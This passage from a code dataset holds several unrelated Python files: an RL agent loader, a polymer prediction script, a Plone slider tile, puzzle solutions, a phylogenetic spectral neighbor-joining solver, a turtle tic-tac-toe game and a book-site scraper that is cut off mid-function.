self.debug:\n\t\t\tprint(\"-----saving weights to {}\".format(file_path))\n\t\t\t\n\t\tself.model.save_weights(file_path)\n\n\t\treturn file_path\n\n\tdef load_model(self, file_path=None):\n\t\t\"\"\"\n\t\tLoad an existing keras model from a file.\n\n\t\t@param file_path The path to an existing keras model file. (optional)\n\t\t\"\"\"\n\n\t\tif file_path is not None:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading model from {}\".format(file_path))\n\t\t\tself.model.load(file_path)\n\t\telse:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading model from {}\".format(self.default_model_path))\n\t\t\tself.model.load(self.default_model_path)\n\n\tdef load_weights(self, file_path=None):\n\t\t\"\"\"\n\t\tLoad existing keras model weights from a file.\n\n\t\t@param file_path The path to an existing keras weights file. (optional)\n\t\t\"\"\"\n\n\t\tif file_path is not None:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading weights from {}\".format(file_path))\n\t\t\tself.model.load_weights(file_path)\n\t\telse:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading weights from {}\".format(self.default_weights_path))\n\t\t\tself.model.load_weights(self.default_weights_path)\n\n\ndef main():\n\tenv_name = 'SpaceInvaders-v0'\n\tenv = gym.make(env_name)\n\n\tstate_dim = (84, 84, 4)\n\taction_cnt = env.action_space.n\n\n\trlagents = RLAgents(state_dim, action_cnt, '_debug_')\n\n\tmini_task = \"say hi\"\n\tstates = np.random.rand(1, 84, 84, 4)\n\tfeedbacks = (states, [5, 4, 3, 2], states, 100, True)\n\n\trlagents.feedback(mini_task, feedbacks)\n\n\taction = rlagents.execute(mini_task, states)\n\tprint(\"------action: {}------\".format(action))\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"LogicRL/RLAgents","sub_path":"ImitationLearningAgents.py","file_name":"ImitationLearningAgents.py","file_ext":"py","file_size_in_byte":8183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13507887269","text":"import argparse\nimport deepchem\nimport json\nimport logging\nfrom pathlib import Path\n\nfrom src.model import ModelWrapper\n\n\nlogger = logging.getLogger('deepchem')\nlogger.disabled = True\n\n\ndef predict(\n keyword_inputs_json: str,\n smiles: str,\n model_checkpoint_path: Path,\n):\n model = ModelWrapper(model_checkpoint_path)\n keyword_inputs = json.loads(keyword_inputs_json)\n print(model(keyword_inputs, smiles))\n\n\ndef create_argument_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model-checkpoint-path\", type=Path, required=True)\n parser.add_argument(\"--smiles\", type=str, required=True)\n parser.add_argument(\"--keyword-inputs-json\", type=str, default='{}')\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_argument_parser()\n args = parser.parse_args()\n predict(**vars(args))","repo_name":"2roptsv/polymer-ai","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4187919672","text":"from plone import api\nfrom plone.app.z3cform.interfaces import IPloneFormLayer\nfrom plone.app.z3cform.widget import RelatedItemsWidget as BaseRelatedItemsWidget\nfrom plone.autoform import directives as form\nfrom plone.supermodel import model\nfrom plone.tiles import PersistentTile\nfrom zope import schema\nfrom zope.schema.vocabulary import SimpleVocabulary\n\nimport json\nimport z3c.form.interfaces\nimport z3c.form.widget\nimport zope.interface\nimport zope.schema.interfaces\n\n\nclass ImagesRelatedItemsWidget(BaseRelatedItemsWidget):\n\n def _base_args(self):\n args = super(ImagesRelatedItemsWidget, self)._base_args()\n args['pattern_options']['selectableTypes'] = ['Image']\n args['pattern_options']['baseCriteria'] = [{\n 'i': 'portal_type',\n 'o': 'plone.app.querystring.operation.selection.any',\n 'v': ['Image', 'Folder']\n }]\n return args\n\n\n@zope.component.adapter(zope.schema.interfaces.IField,\n IPloneFormLayer)\n@zope.interface.implementer(z3c.form.interfaces.IFieldWidget)\ndef ImagesRelatedItemsFieldWidget(field, request):\n widget = z3c.form.widget.FieldWidget(field, ImagesRelatedItemsWidget(request))\n widget.vocabulary = 'plone.app.vocabularies.Catalog'\n return widget\n\n\nclass SliderTile(PersistentTile):\n\n @property\n def pattern_options(self):\n opts = {\n 'animation': self.data.get('animation', 'fade'),\n 'controlNav': self.data.get('controlNav', True),\n 'directionNav': self.data.get('directionNav', True),\n 'slideshowSpeed': self.data.get('slideshowSpeed', 7000),\n 'animationSpeed': self.data.get('animationSpeed', 600)\n }\n return json.dumps(opts)\n\n def render(self):\n return self.index()\n\n @property\n def height(self):\n return self.data.get('height', 250)\n\n def get_image_data_from_brain(self, brain):\n base_url = brain.getURL()\n return {\n 'large': '%s/@@images/image/large' % base_url,\n 'medium': '%s/@@images/image/mini' % base_url,\n 'thumb': '%s/@@images/image/thumb' % base_url,\n 'original': base_url,\n 'title': brain.Title,\n 'description': brain.Description,\n 'link': '%s/view' % base_url\n }\n\n def get_image_data(self, im):\n base_url = im.absolute_url()\n related = self.get_related(im) or im\n return {\n 'large': '%s/@@images/image/large' % base_url,\n 'medium': '%s/@@images/image/mini' % base_url,\n 'thumb': '%s/@@images/image/thumb' % base_url,\n 'original': base_url,\n 'title': im.Title(),\n 'description': im.Description(),\n 'link': '%s/view' % related.absolute_url()\n }\n\n def get_images_in_folder(self, brain):\n if brain.portal_type == 'Folder':\n # get contents\n folder = brain.getObject()\n images = folder.getFolderContents()\n results = []\n for image in images:\n if image.portal_type == 'Image':\n results.append(self.get_image_data_from_brain(image))\n else:\n obj = image.getObject()\n if hasattr(obj, 'image') and hasattr(obj.image, 'contentType'):\n results.append(self.get_image_data(obj))\n return results\n else:\n return [self.get_image_data_from_brain(brain)]\n\n @property\n def images(self):\n results = []\n catalog = api.portal.get_tool('portal_catalog')\n brains = list(catalog(UID=self.data.get('images', [])))\n # we need to order this since catalog results are not ordered\n for uid in self.data['images']:\n found = False\n for brain in brains:\n if brain.UID == uid:\n found = brain\n break\n if not found:\n continue\n brains.remove(found)\n if found.is_folderish:\n results.extend(self.get_images_in_folder(brain))\n else:\n results.append(self.get_image_data_from_brain(found))\n return results\n\n\nclass ISliderTileSchema(model.Schema):\n\n form.widget(images=ImagesRelatedItemsFieldWidget)\n images = schema.List(\n title=u\"Images\",\n description=u\"Select images or folders of images to display in slider.\"\n u\" If the image has a related item selected, that \"\n u\"related item will be used for the link and description \"\n u\"for the slide display\",\n value_type=schema.Choice(\n vocabulary='plone.app.vocabularies.Catalog'\n )\n )\n\n animation = schema.Choice(\n title=u'Animation',\n vocabulary=SimpleVocabulary([\n SimpleVocabulary.createTerm('fade', 'fade', 'Fade'),\n SimpleVocabulary.createTerm('slide', 'slide', 'Slide'),\n ]),\n default='fade'\n )\n\n controlNav = schema.Bool(\n title=u'Control nav',\n default=True)\n\n directionNav = schema.Bool(\n title=u'Direction nav',\n default=True)\n\n slideshowSpeed = schema.Int(\n title=u'Cycle speed',\n description=u'In milliseconds',\n default=7000)\n\n animationSpeed = schema.Int(\n title=u'Animation speed',\n description=u'In milliseconds',\n default=600)\n","repo_name":"jazkarta/ploneconf2016.policy","sub_path":"ploneconf2016/policy/tiles/slider.py","file_name":"slider.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19628024715","text":"\nfrom utils import Input, printResult\nimport re\n\n# https://adventofcode.com/2020/day/18\n\ninput = Input(2020, 18).lines()\ninput = [s.replace(\" \", \"\") for s in input]\n\n# expr :: term (+|* term)*\n# term :: int | (expr)\n\ndef term1(input):\n val = input.pop(0)\n if val == '(':\n val = expr1(input)\n input.pop(0)\n return int(val)\n\ndef expr1(input):\n result = term1(input)\n while input and input[0] in ['*', '+']:\n op = int.__add__ if input[0] == '+' else int.__mul__\n input.pop(0)\n result = op(result, term1(input))\n return result\n\n# expr :: term (* term)*\n# term :: factor (+ factor)*\n# factor :: int | (expr)\n\ndef factor2(input):\n val = input.pop(0)\n if val == '(':\n val = expr2(input)\n input.pop(0)\n return int(val)\n\ndef term2(input):\n result = factor2(input)\n while input and input[0] == '+':\n input.pop(0)\n result += factor2(input)\n return result\n\ndef expr2(input):\n result = term2(input)\n while input and input[0] == '*':\n input.pop(0)\n result *= term2(input)\n return result\n\nprintResult(1, sum(map(expr1, map(list, input))))\nprintResult(2, sum(map(expr2, map(list, input))))\n","repo_name":"Zefick/Advent-of-Code","sub_path":"src/Python/2020/Day18.py","file_name":"Day18.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437366420","text":"from common import TreeNode\n\n\nclass Solution:\n def postorderTraversal(self, root):\n if not root:\n return []\n res, visited = [], set()\n stack = [root]\n node = root\n while len(stack):\n if node.left and node.left not in visited:\n stack.append(node)\n node = node.left\n elif node.right and node.right not in visited:\n stack.append(node)\n node = node.right\n else:\n res.append(node.val)\n visited.add(node)\n node = stack.pop()\n return res\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(TreeNode.list2Tree([1, None, 2, 3]))\n print(solution.postorderTraversal(TreeNode.list2Tree([1, None, 2, 3])))\n","repo_name":"MadSkittles/leetcode","sub_path":"145.py","file_name":"145.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18907629186","text":"\"\"\"\nThis file stores a subclass of DistanceSolver, SpectralNeighborJoining. This \nalgorithm is based on the one developed by Jaffe, et al. (2021) in their paper \ntitled \"Spectral neighbor joining for reconstruction of latent tree models\",\npublished in the SIAM Journal for Math and Data Science. \n \n\"\"\"\nfrom typing import Callable, Dict, List, Optional, Tuple\n\nimport itertools\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport scipy\n\nfrom cassiopeia.data import CassiopeiaTree\nfrom cassiopeia.solver import (\n dissimilarity_functions,\n DistanceSolver,\n solver_utilities,\n)\n\n\n\nclass SpectralNeighborJoiningSolver(DistanceSolver.DistanceSolver):\n \"\"\"\n Spectral Neighbor-Joining class for Cassiopeia.\n\n Implements a variation on the Spectral Neighbor-Joining (abbrev SNJ)\n algorithm described by Jaffe et al. in their 2020 paper. This class\n implements the abstract class DistanceSolver, and inherits the 'solve'\n method from DistanceSolver with the 'find_cherry' method implemented using a\n spectral method as in Jaffe et al. (2020). In particular, we iteratively\n join subsets of leaves into a cherry based on the second singular value of\n the RA matrix of the pair. We start with all the subsets being singleton\n sets with each leaf node, then compute the second singular values of the RA\n matrices where A = S U T, S and T are distinct subsets of leaves, and RA is\n the matrix with rows indexed by elements of A and columns indexed by\n elements of A 's complement, and entries are R(i, j). These values are\n stored in a lambda matrix (rows and columns are subsets, entries are second\n singular values of RA) to avoid recalculating values. Finally we find the\n pair of (S, T) that gives the smallest second singular value for RA and\n replace S and T with S U T in the set of subsets, thereby joining S and T\n into a cherry. Repeat this process until there are only two remaining\n subsets. The runtime is O(n^4), but in reality will perform better than\n this.\n\n Args:\n similarity_function: A function by which to compute the similarity map,\n corresponding to the affinity R(i, j) in Jaffe et al.\n (2020). Note that this similarity score should be multiplicative,\n i.e. R(i, j) = R(i, k) * R(k, j) for k on the path from i to j on\n the lineage tree. By default we will use exp(-d(i,j)) where d is the\n metric given by weighted_hamming_distance from\n dissimilarity_functions without weights given.\n add_root: Whether or not to add an implicit root to the tree, i.e. a\n root with unmutated characters.\n prior_transformation: Function to use when transforming\n priors into weights\n \"\"\"\n\n def __init__(\n self,\n similarity_function: Optional[\n Callable[\n [np.ndarray, np.ndarray, int, Dict[int, Dict[int, float]]],\n float,\n ]\n ] = dissimilarity_functions.exponential_negative_hamming_distance,\n # type: ignore\n add_root: bool = False,\n prior_transformation: str = \"negative_log\",\n ):\n self._implementation = \"generic_spectral_nj\"\n \n super().__init__(\n dissimilarity_function=similarity_function,\n add_root=add_root,\n prior_transformation=prior_transformation,\n ) # type: ignore\n \n self._similarity_map = None\n self._lambda_indices = None\n\n\n def get_dissimilarity_map(\n self, cassiopeia_tree: CassiopeiaTree, layer: Optional[str] = None\n ) -> pd.DataFrame:\n \"\"\"Outputs the first lambda matrix.\n\n The lambda matrix is a k x k matrix indexed by the k subsets\n being considered at each step of the SNJ algorithm. The i, j th element\n is given by taking the second singular value of the RA matrix with A\n given by the union of the two sets indexed by i and j. This function\n generates the initial lambda matrix, where every subset is a singleton\n leaf node. This function has a runtime of O(n^3), with n the\n number of leaf nodes.\n\n Args:\n cassiopeia_tree: the CassiopeiaTree object passed into solve()\n layer: Layer storing the character matrix for solving. If None, the\n default character matrix is used in the CassiopeiaTree.\n\n Returns:\n DataFrame object of the lambda matrix, but similar in structure to\n DistanceSolver's dissimilarity_map.\n \"\"\"\n\n # get dissimilarity map and save it as private instance variable\n self._similarity_map = super().get_dissimilarity_map(\n cassiopeia_tree, layer\n )\n\n # prepare for first (pairwise) lambda matrix\n N = self._similarity_map.shape[0]\n node_names: np.ndarray = self._similarity_map.index.values\n self._lambda_indices = [[i] for i in range(N)]\n\n # generate the lambda matrix\n lambda_matrix_arr = np.zeros([N, N])\n for (j_idx, i_idx) in itertools.combinations(range(N), 2):\n\n svd2_val = self._compute_svd2(\n pair=(i_idx, j_idx), lambda_indices=self._lambda_indices\n )\n\n lambda_matrix_arr[i_idx, j_idx] = lambda_matrix_arr[\n j_idx, i_idx\n ] = svd2_val\n\n np.fill_diagonal(lambda_matrix_arr, np.inf)\n\n # convert array to dataframe\n lambda_matrix_df = pd.DataFrame(\n lambda_matrix_arr, index=node_names, columns=node_names\n )\n\n return lambda_matrix_df\n\n def find_cherry(self, dissimilarity_map: np.ndarray) -> Tuple[int, int]:\n \"\"\"Finds a pair of samples to join into a cherry.\n\n With dissimilarity_map being the lambda matrix, this method finds the\n argmin pair of subsets of the lambda matrix. The lambda matrix\n consists of rows and columns indexed by subsets of leaves and with\n entries a_ij given by the second singular value of RA where A = S U T, S\n and T being the subsets of leaves corresponding to i and j respectively.\n If i = j, a_ij is set to 'np.inf'. The pair of samples to be\n joined into a cherry is given by the pair (i, j) with the smallest entry\n in the lambda matrix.\n\n Args:\n dissimilarity_matrix: Lambda matrix\n\n Returns:\n A tuple of integers representing rows in the\n dissimilarity matrix to join.\n \"\"\"\n\n return np.unravel_index(\n np.argmin(dissimilarity_map, axis=None), dissimilarity_map.shape\n )\n\n def _compute_svd2(\n self, pair: Tuple[int, int], lambda_indices: List[List[int]]\n ) -> float:\n \"\"\"Computes the second largest singular value for an RA matrix.\n \n From Jaffe et al., the RA matrix is the matrix given by taking\n rows indexed by elements of A, and columns indexed by elements of the\n complement of A. Entries are given by R(i, j), the similarity score\n between i and j. Here, our subset A is given by unioning the\n subsets given in 'pair'. The procedure takes O(n^3) time where n is the\n number of leaves. On average it should be more efficient because we are\n not computing the singular value decomposition of a whole nxn matrix, RA\n is smaller than nxn. \n\n Args:\n pair: pair of indices i and j where i > j.\n lambda_indices: the list of subsets for\n which 'pair' refers to.\n\n Returns:\n The second largest singular value of the pair's RA matrix.\n \"\"\"\n i_idx, j_idx = pair\n i_sub, j_sub = lambda_indices[i_idx], lambda_indices[j_idx]\n\n # get combined pair of subsets\n a_subset = [*i_sub, *j_sub]\n\n # get complement\n a_comp = lambda_indices.copy()\n a_comp.pop(i_idx)\n a_comp.pop(j_idx)\n a_comp_flat = list(itertools.chain.from_iterable(a_comp))\n\n # reconstruct RA matrix\n RA_matrix = self._similarity_map.values[np.ix_(a_subset, a_comp_flat)]\n\n # get second largest SVD if available, first if not.\n s = scipy.linalg.svd(RA_matrix, compute_uv=False, check_finite=False)\n if len(s) >= 2:\n svd2_val = s[1]\n else:\n svd2_val = 0\n\n return svd2_val\n\n def update_dissimilarity_map(\n self,\n similarity_map: pd.DataFrame,\n cherry: Tuple[str, str],\n new_node: str,\n ) -> pd.DataFrame:\n \"\"\"Updates the lambda matrix using the pair of subsets from find_cherry.\n\n Args:\n similarity_map: lambda matrix to update\n cherry1: One of the children to join.\n cherry2: One of the children to join.\n new_node: New node name to add to the dissimilarity map\n\n Returns:\n An updated lambda matrix.\n \"\"\"\n # get cherry nodes in index of lambda matrix\n i, j = (\n np.where(similarity_map.index == cherry[0])[0][0],\n np.where(similarity_map.index == cherry[1])[0][0],\n )\n\n # modify names\n node_names = similarity_map.index.values\n node_names = np.concatenate((node_names, [new_node]))\n boolmask = np.ones((len(node_names),), bool)\n boolmask[[i, j]] = False\n node_names = node_names[boolmask]\n\n # modify indices\n self._lambda_indices.append(\n [*self._lambda_indices[i], *self._lambda_indices[j]]\n )\n self._lambda_indices.pop(max(i, j))\n self._lambda_indices.pop(min(i, j))\n\n # new lambda indices\n N = len(self._lambda_indices)\n\n if N <= 2:\n return pd.DataFrame(\n np.zeros([N, N]), index=node_names, columns=node_names\n )\n\n # get the old lambda matrix\n lambda_matrix_arr = similarity_map.drop(\n index=[cherry[0], cherry[1]], columns=[cherry[0], cherry[1]]\n ).values\n\n # add new col + row to lambda matrix\n new_row = np.array([0.0] * (N - 1))\n lambda_matrix_arr = np.vstack(\n (lambda_matrix_arr, np.atleast_2d(new_row))\n )\n new_col = np.array([0.0] * N)\n lambda_matrix_arr = np.array(\n np.hstack((lambda_matrix_arr, np.atleast_2d(new_col).T))\n )\n\n # compute new SVDs\n i_idx = N - 1\n for j_idx in range(i_idx):\n svd2_val = self._compute_svd2(\n pair=(i_idx, j_idx), lambda_indices=self._lambda_indices\n )\n\n lambda_matrix_arr[i_idx, j_idx] = lambda_matrix_arr[\n j_idx, i_idx\n ] = svd2_val\n\n np.fill_diagonal(lambda_matrix_arr, np.inf)\n\n # regenerate lambda matrix\n lambda_matrix_df = pd.DataFrame(\n lambda_matrix_arr, index=node_names, columns=node_names\n )\n\n return lambda_matrix_df\n\n def setup_root_finder(self, cassiopeia_tree: CassiopeiaTree) -> None:\n \"\"\"Gives the implicit rooting strategy for the SNJ Solver.\n\n By default, the SpectralNeighborJoining algorithm returns an\n unrooted tree. To root this tree, an implicit root of all zeros is\n added to the character matrix. Then, the dissimilarity map is\n recalculated using the updated character matrix. If the tree already\n has a computed dissimilarity map, only the new similarities are\n calculated. See 'setup_root_finder' in NeighborJoiningSolver.\n\n Args:\n cassiopeia_tree: Input CassiopeiaTree to `solve`\n \"\"\"\n character_matrix = cassiopeia_tree.character_matrix.copy()\n rooted_character_matrix = character_matrix.copy()\n\n root = [0] * rooted_character_matrix.shape[1]\n rooted_character_matrix.loc[\"root\"] = root\n cassiopeia_tree.root_sample_name = \"root\"\n cassiopeia_tree.character_matrix = rooted_character_matrix\n\n if self.dissimilarity_function is None:\n raise DistanceSolver.DistanceSolverError(\n \"Please specify a dissimilarity function to add an implicit \"\n \"root, or specify an explicit root\"\n )\n\n dissimilarity_map = cassiopeia_tree.get_dissimilarity_map()\n if dissimilarity_map is None:\n cassiopeia_tree.compute_dissimilarity_map(\n self.dissimilarity_function, self.prior_transformation\n )\n else:\n dissimilarity = {\"root\": 0}\n for leaf in character_matrix.index:\n weights = None\n if cassiopeia_tree.priors:\n weights = solver_utilities.transform_priors(\n cassiopeia_tree.priors, self.prior_transformation\n )\n dissimilarity[leaf] = self.dissimilarity_function(\n rooted_character_matrix.loc[\"root\"].values,\n rooted_character_matrix.loc[leaf].values,\n cassiopeia_tree.missing_state_indicator,\n weights,\n )\n cassiopeia_tree.set_dissimilarity(\"root\", dissimilarity)\n\n cassiopeia_tree.character_matrix = character_matrix\n\n def root_tree(\n self, tree: nx.Graph, root_sample: str, remaining_samples: List[str]\n ) -> nx.DiGraph:\n \"\"\"Assigns a node as the root of the solved tree.\n\n Finds a location on the tree to place a root and converts the general\n graph to a directed graph with respect to that root.\n\n Args:\n tree: Networkx object representing the tree topology\n root_sample: Sample to treat as the root\n remaining_samples: The last two unjoined nodes in the tree\n\n Returns:\n A rooted tree\n \"\"\"\n tree.add_edge(remaining_samples[0], remaining_samples[1])\n\n rooted_tree = nx.DiGraph()\n for e in nx.dfs_edges(tree, source=root_sample):\n rooted_tree.add_edge(e[0], e[1])\n\n return rooted_tree\n","repo_name":"YosefLab/Cassiopeia","sub_path":"cassiopeia/solver/SpectralNeighborJoiningSolver.py","file_name":"SpectralNeighborJoiningSolver.py","file_ext":"py","file_size_in_byte":14019,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"14251906241","text":"import turtle\n\nMARGIN = 50 \nBOARD_WIDTH = 600\nDIMENSION = 3\nCELL_SIZE = BOARD_WIDTH / DIMENSION\nDELTA = CELL_SIZE / 8\ndata = []\nfor _ in range (DIMENSION):\n temp = []\n for _ in range (DIMENSION):\n temp.append(0)\n data.append(temp)\n\n#turtle.onscreenclick\n\ndef checkAnyWin(ln):\n if sum(ln) == DIMENSION:\n return 'x'\n elif sum(ln) == -DIMENSION:\n return'o'\n \n return ''\n\ndef checkWin():\n # check cols\n for i in range(DIMENSION):\n ln = data[i]\n w = checkAnyWin(ln)\n if w != '':\n return w\n\n # check rows\n for i in range(DIMENSION):\n ln = []\n for j in range(DIMENSION):\n ln.append(data[j][i])\n \n w = checkAnyWin(ln)\n if w != '':\n return w\n \n # check main diagnal\n ln = []\n for i in range(DIMENSION):\n for j in range(DIMENSION):\n if i == j:\n ln.append(data[i][j])\n\n w = checkAnyWin(ln)\n if w !='':\n return w\n\n # check auti diagnal\n ln = []\n for i in range(DIMENSION):\n for j in range(DIMENSION):\n if i + j == DIMENSION - 1:\n ln.append(data[i][j])\n \n w = checkAnyWin(ln)\n if w != '':\n return w\n\n for i in range(DIMENSION):\n for j in range(DIMENSION):\n if data[i][j] == 0:\n return ''\n\n return '-'\n\n\n\ndef drawLine(x1, y1, x2, y2, color = '#cb997e'):\n t = turtle.Turtle()\n t.hideturtle()\n t.speed(0)\n t.penup()\n t.goto(x1,y1)\n t.pendown()\n t.goto(x2,y2)\n\n\ndef drawXPiece(x, y) :\n t = turtle.Turtle()\n t.hideturtle()\n t.speed(0)\n t.color('#cb997e')\n t.width(DELTA)\n\n t.penup()\n t.goto(x-CELL_SIZE/2 + DELTA, y - CELL_SIZE/2 + DELTA)\n t.pendown()\n t.goto(x+CELL_SIZE/2 - DELTA, y + CELL_SIZE/2 - DELTA)\n\n t.penup()\n t.goto(x+CELL_SIZE/2 - DELTA, y - CELL_SIZE/2 + DELTA)\n t.pendown()\n t.goto(x-CELL_SIZE/2 + DELTA, y + CELL_SIZE/2 - DELTA)\n\ndef drawOPieceV(x,y) :\n t = turtle.Turtle()\n t.hideturtle()\n t.speed(0)\n t.color('#ddbea9')\n t.width(DELTA)\n t.penup()\n t.goto(x,y)\n t.pendown()\n t.dot(CELL_SIZE-DELTA*2)\n t.color('#ffe8d6')\n t.dot(CELL_SIZE-DELTA*4)\n\ndef dropXPiece(col, row):\n x = -BOARD_WIDTH / 2 + col * CELL_SIZE + CELL_SIZE / 2\n y = -BOARD_WIDTH / 2 + row * CELL_SIZE + CELL_SIZE / 2\n drawXPiece(x, y)\n data[col][row] = 1\n\ndef dropOPiece(col, row):\n x = -BOARD_WIDTH / 2 + col * CELL_SIZE + CELL_SIZE / 2\n y = -BOARD_WIDTH / 2 + row * CELL_SIZE + CELL_SIZE / 2\n drawOPieceV(x, y)\n data[col][row] = -1\n\ndef declareWinner(w):\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n t.goto(-BOARD_WIDTH / 2, -BOARD_WIDTH / 2 - 50)\n statement = w + ' wins :)' \n if w == 'x' :\n t.color('#cb997e')\n elif w == 'o' :\n t.color('#ddbea9')\n else:\n t.color('#8b8d70')\n statement = 'tie :('\n t.write(statement, font = ('Courier', 50, 'normal', 'bold'))\n\ndef handleClick(x, y):\n # if click is outside the board, ignore it\n if x < -BOARD_WIDTH / 2 or x > BOARD_WIDTH / 2 or y <-BOARD_WIDTH / 2 or y > BOARD_WIDTH / 2:\n return\n global cur_player\n col, row = xy2ColRow(x, y)\n if data[col][row] != 0: # do nothing if there's already a piece at col, row\n return\n\n if cur_player == 'x':\n dropXPiece(col, row)\n cur_player = 'o'\n else:\n dropOPiece(col, row)\n cur_player = 'x'\n \n w = checkWin()\n if w == '':\n return\n declareWinner(w)\n answer = turtle.textinput('Play once more?', 'Does thou desire to play once more? (yes/no)')\n if answer == 'y':\n reset()\n else:\n turtle.bye()\n\ndef reset():\n global data\n data = ([0 for i in range(DIMENSION)] for j in range(DIMENSION))\n turtle.clearscreen()\n drawBoard()\n playGame()\n\ndef playGame():\n sn = turtle.Screen()\n sn.onclick(handleClick)\n\ncur_player = 'x'\n\ndef xy2ColRow(x, y):\n startX = -BOARD_WIDTH / 2\n startY = -BOARD_WIDTH / 2\n col = int((x - startX) / CELL_SIZE)\n col = int((x + BOARD_WIDTH / 2) / CELL_SIZE)\n row = int((y + BOARD_WIDTH / 2) / CELL_SIZE)\n return col, row\n\ndef drawBoard():\n turtle.setup(BOARD_WIDTH + MARGIN * 2, BOARD_WIDTH + MARGIN * 2)\n startX = -BOARD_WIDTH / 2\n startY = -BOARD_WIDTH / 2\n\n for i in range(DIMENSION + 1) :\n x1 = startX\n y1 = startY + i * BOARD_WIDTH / DIMENSION\n x2 = startX + BOARD_WIDTH\n y2 = startY + i * BOARD_WIDTH / DIMENSION \n drawLine(x1,y1,x2,y2)\n\n for i in range(DIMENSION + 1):\n x1 = startX + i * BOARD_WIDTH / DIMENSION\n y1 = startY\n x2 = startX + i * BOARD_WIDTH / DIMENSION\n y2 = startY + BOARD_WIDTH\n drawLine(x1,y1,x2,y2)\n\n \n\n\n#main logic\ndrawBoard()\nplayGame()\nturtle.done()\n\n#O O\n# L\n# n","repo_name":"cosmosuo/tacky-toes","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23762186104","text":"import os\nimport re\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom queue import Queue\nimport threading\nimport time\nimport concurrent.futures\n\nexitFlag = 0\nno_threads = 50\nthreadlist=[]\n\nfor t in range(1, no_threads):\n threadlist.append(t)\n\nqueueLock = threading.Lock()\nworkQueue = Queue(100)\nthreads = []\nthreadID = 1\n \n\ndef html_parser(url):\n # parse url to html\n # param: url - website url to scrape\n response = requests.get(url)\n soup = bs(response.content, 'html.parser')\n return soup\n\ndef get_book_info(book_url):\n # book information and download book image\n print('Sraping url : ', book_url)\n html_book_content = html_parser(book_url)\n download_book_image(get_book_url_image(book_url, html_book_content))\n info = product_info(html_book_content)\n book_info = {\n # 1. product page url\n 'product_page_url' : book_url,\n # 2. universal product code (upc)\n 'universal_product_code' : info['UPC'],\n # 3. title\n 'title' : get_book_title(html_book_content),\n # 4. price_including_tax\n 'price_including_tax' : info['Price (incl. tax)'],\n # 5. price_excluding_tax'\n 'price_excluding_tax' : info['Price (excl. tax)'],\n # 6. number_available\n 'number_available' : get_stock_number(info['Availability']),\n # 7. product description\n 'product_description' : get_book_description(html_book_content),\n # 8. category\n 'category' : get_book_category(html_book_content),\n # 9. review_rating - class=\"star-rating One”\n 'review_rating' : get_rating(html_book_content),\n # 10. image_url\n 'image_url' : get_book_url_image(book_url, html_book_content)\n }\n\n if book_info:\n return book_info \n return False\n\ndef get_stock_number(content):\n # stock available\n stock = re.sub(r'[()]','', content).split()\n return stock[2]\n\ndef product_info(html_book_content):\n # get product information: UPC, prices, stock availability\n content = html_book_content.findAll('tr')\n info = {}\n for i in content:\n info[i.findChildren()[0].text] = i.findChildren()[1].text\n return info\n\ndef get_rating(html_book_content):\n content = html_book_content.find('p', class_='star-rating')\n stars = content['class'][-1]\n # rating view\n rating = {\n 'One' : 1,\n 'Two' : 2,\n 'Three' : 3,\n 'Four' : 4,\n 'Five' : 5\n }\n if stars in rating:\n return rating[stars]\n\n return False\n\ndef get_book_description(html_book_content):\n # book description\n description = html_book_content.find('p', class_=False, id=False)\n if description:\n return description.string\n else: \n return False \n\n\ndef get_book_title(html_book_content):\n # book title\n title = html_book_content.title.text\n return title.strip()\n\n\ndef get_book_category(html_book_content):\n # book category\n category = html_book_content.find('ul', class_='breadcrumb')\n content = category.findChildren()[4]\n if content:\n return content.text.strip()\n else:\n return False\n\ndef get_book_url_image(book_url, html_book_content):\n # image url\n url_image = html_book_content.find('img', class_=False, id=False)\n if url_image.has_attr('src'):\n filename = re.search(r'/([\\w_-]+[.](jpg|gif|png))$', url_image['src'])\n if filename and 'http' not in url_image['src']:\n # modify image url\n img = url_image['src'][6:]\n url = '{}{}'.format(book_url[:27], img)\n return str(url)\n else:\n # if image extension doesn't exist\n print(\"Error filename: {}\".format(url_image['src']))\n return False\n\n\n# def get_book_url(website_url, main_html):\n# # return book full url\n# content = main_html.find('div', class_='image_container')\n# get_link = content.find('a')['href']\n# if 'http' not in get_link:\n# url = '{}{}'.format(website_url, get_link)\n# return url\n# return False\ndef get_next_page(url):\n # retrieve all url of all pages existing\n tmp = url[:-10]\n category_url = [url] \n while True:\n html = html_parser(category_url[-1])\n next_page = html.find('li', class_='next')\n if next_page:\n link = next_page.find('a')\n working_url = requests.get('{}{}'.format(tmp, link['href']))\n if working_url.status_code == 200: \n category_url.append('{}{}'.format(tmp, link['href']))\n else:\n break \n else:\n break \n\n return category_url\n\n\ndef get_tmp_books_urls(url):\n # return all value foun in href in each books\n html = html_parser(url)\n content = html.findAll('ol', class_='row')\n temp_links = []\n for div in content:\n # product container\n divs = div.findAll('div', class_='image_container')\n for a in divs:\n # get book links\n hlinks = a.findAll('a', href= True)\n for link in hlinks:\n temp_links.append(link['href'])\n\n return temp_links\n\ndef get_all_books_url(category_url):\n \n # https://books.toscrape.com/catalogue\n 